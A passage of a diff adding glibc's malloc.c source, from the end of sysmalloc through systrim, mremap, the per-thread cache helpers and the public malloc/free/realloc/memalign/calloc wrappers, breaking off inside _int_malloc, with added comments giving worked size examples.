+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
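+
+/* Illustrative example, assuming the default M_TOP_PAD of 0x20000 (128 KiB),
+   a 4 KiB page and MINSIZE == 0x20 on a 64-bit build: with
+   chunksize (av->top) == 0x42000, top_area == 0x41fdf and
+   extra == ALIGN_DOWN (0x21fdf, 0x1000) == 0x21000, so roughly 0x21000
+   bytes are handed back to the kernel via MORECORE (-extra).  */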
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
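+
+/* Illustrative sizes, assuming the default TCACHE_MAX_BINS of 64 on a
+   64-bit build: counts occupies 64 * 2 == 128 bytes and entries
+   64 * 8 == 512 bytes, so the structure itself is 0x280 bytes and is
+   typically served from a 0x290-sized heap chunk by tcache_init below.  */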
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
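+
+/* Example of the resulting LIFO behaviour: if two same-sized chunks A and
+   then B are placed in the same bin via tcache_put, B->next points to A,
+   so the next two tcache_get calls for that bin return B first and then
+   A.  */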
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* _int_free also calls request2size, so be careful not to pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
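+      /* Illustrative example with the defaults on 64-bit Linux: freeing a
+         ~2 MiB mmapped chunk while mmap_threshold is still 128 KiB raises
+         mmap_threshold to that chunk's size and trim_threshold to twice
+         that, so later allocations of the same size come from the heap
+         instead of fresh mmap/munmap pairs.  */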
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
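+
+  /* Illustrative example: a requested alignment of 48 is not a power of
+     two; the loop above starts at 2 * MALLOC_ALIGNMENT (32 on a typical
+     64-bit build) and doubles to 64, so the allocation is carried out
+     with 64-byte alignment.  */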
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
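+  /* Illustrative example on a 64-bit build: calloc (1UL << 32, 1UL << 32)
+     multiplies to 2^64, which does not fit in the ptrdiff_t BYTES, so the
+     overflow check fires and the call fails with ENOMEM; using ptrdiff_t
+     also rejects products above PTRDIFF_MAX.  */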
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
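+  /* Illustrative example: a 0x40-byte chunk (SIZE_SZ == 8) has
+     csz - SIZE_SZ == 0x38, i.e. nclears == 7, so the unrolled path below
+     zeroes d[0..6] and the memset branch is skipped.  */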
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
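+
+  /* Illustrative example, assuming a 64-bit build (SIZE_SZ == 8,
+     MALLOC_ALIGNMENT == 16): a request for 24 bytes becomes nb == 0x20,
+     while a request for 25 bytes becomes nb == 0x30.  */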
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
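+/* REMOVE_FB is a lock-free pop: e.g. with a fastbin holding A -> B -> C,
+   a successful compare-and-exchange swings *fb from A to A->fd (B) and
+   leaves victim == A; if another thread popped A first, the returned old
+   head differs from victim and the do/while loop retries with the new
+   head.  */
+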
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
